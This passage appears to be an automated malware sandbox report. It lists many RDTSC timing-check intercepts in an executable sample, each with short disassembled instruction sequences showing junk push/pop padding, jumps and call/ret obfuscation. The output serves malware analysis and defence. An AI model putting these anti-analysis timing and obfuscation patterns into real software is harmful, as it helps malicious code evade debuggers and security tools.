00007F5F64D1DF16h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFC4C second address: 8FFC5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5F64D1DAB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFC5E second address: 8FFC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFC68 second address: 8FFC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 902C4A second address: 902C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 902C4E second address: 902C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 902C54 second address: 902C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901D78 second address: 901D9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5F64D1DAC3h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F5F64D1DAB8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901EBB second address: 901EC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 903ADD second address: 903AE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 903AE2 second address: 903AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90E15E second address: 90E164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D879 second address: 90D8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jg 00007F5F64D1DF16h 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jo 00007F5F64D1DF16h 0x00000018 pop ecx 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d jng 00007F5F64D1DF28h 0x00000023 jmp 00007F5F64D1DF1Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D9E8 second address: 90D9EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D9EC second address: 90D9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D9F6 second address: 90D9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90DCDE second address: 90DCE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9110F7 second address: 9110FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9110FD second address: 911113 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F5F64D1DF16h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F5F64D1DF16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911113 second address: 91114E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5F64D1DAC6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91114E second address: 911175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F5F64D1DF21h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F5F64D1DF16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91132F second address: 911333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911333 second address: 911351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5F64D1DF23h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911351 second address: 911380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DAC5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F5F64D1DABCh 0x00000019 jne 00007F5F64D1DAB6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911380 second address: 91138A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5F64D1DF16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911451 second address: 91145B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91145B second address: 91148C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5F64D1DF22h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91148C second address: 911492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 918082 second address: 918086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89FD09 second address: 89FD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916D95 second address: 916D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916D9B second address: 916DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5F64D1DAC1h 0x0000000a jmp 00007F5F64D1DAC7h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916DCE second address: 916DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916DD2 second address: 916DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917923 second address: 91792D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DF1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89FCFD second address: 89FD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5F64D1DABCh 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917A5F second address: 917A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F5F64D1DF16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917A71 second address: 917AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F5F64D1DAC6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F5F64D1DABEh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5F64D1DAC4h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AA7 second address: 917AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AAD second address: 917AB4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AB4 second address: 917ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917ABD second address: 917AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DAC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AD5 second address: 917AD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AD9 second address: 917ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917C56 second address: 917C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F08 second address: 917F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5F64D1DAB6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F16 second address: 917F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5F64D1DF16h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F24 second address: 917F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F29 second address: 917F30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91BB01 second address: 91BB1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F5F64D1DAB6h 0x00000009 pushad 0x0000000a popad 0x0000000b js 00007F5F64D1DAB6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F5F64D1DAB6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E6FE9 second address: 8D1664 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5F64D1DF16h 0x00000009 jns 00007F5F64D1DF16h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F5F64D1DF21h 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F5F64D1DF18h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 sbb di, 19B5h 0x00000038 call dword ptr [ebp+12450DF6h] 0x0000003e push edi 0x0000003f pushad 0x00000040 jmp 00007F5F64D1DF27h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7196 second address: 8E719B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E719B second address: 8E71B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E770A second address: 8E7725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5F64D1DAC0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7725 second address: 8E776E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5F64D1DF2Eh 0x0000000c jmp 00007F5F64D1DF28h 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 jmp 00007F5F64D1DF1Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5F64D1DF20h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E776E second address: 8E7772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7772 second address: 8E7796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a push eax 0x0000000b jnp 00007F5F64D1DF16h 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push esi 0x00000019 jne 00007F5F64D1DF16h 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7796 second address: 8E779A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E78D8 second address: 8E78DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E79F1 second address: 8E79FB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E79FB second address: 8E7A12 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DF1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A12 second address: 8E7A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A18 second address: 8E7A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A1D second address: 8E7A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A23 second address: 8E7A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A27 second address: 8E7A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A2B second address: 8E7A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jc 00007F5F64D1DF1Eh 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7C45 second address: 8E7C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7C4B second address: 8E7C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8079 second address: 8E8084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8084 second address: 8E808D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E838C second address: 8E8392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8392 second address: 8E8396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8396 second address: 8E83AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F5F64D1DAB8h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E83AC second address: 8E83C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E84C4 second address: 8E8519 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F5F64D1DAB8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 xor dword ptr [ebp+122D31BBh], esi 0x0000002e add ecx, dword ptr [ebp+122D2AB7h] 0x00000034 lea eax, dword ptr [ebp+1247BD74h] 0x0000003a or dl, FFFFFFCAh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 jng 00007F5F64D1DAB6h 0x00000047 jnp 00007F5F64D1DAB6h 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8519 second address: 8E856D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F5F64D1DF16h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D2A4Fh] 0x00000015 jng 00007F5F64D1DF1Bh 0x0000001b lea eax, dword ptr [ebp+1247BD30h] 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F5F64D1DF18h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b nop 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jo 00007F5F64D1DF16h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E856D second address: 8E8587 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F5F64D1DAC8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007F5F64D1DAB6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8587 second address: 8E858B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F357 second address: 91F35B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F35B second address: 91F37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5F64D1DF1Bh 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jc 00007F5F64D1DF16h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F5F7 second address: 91F5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F5FB second address: 91F610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F610 second address: 91F64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F5F64D1DAD3h 0x0000000c jmp 00007F5F64D1DABEh 0x00000011 jmp 00007F5F64D1DABFh 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5F64D1DABDh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F64D second address: 91F651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
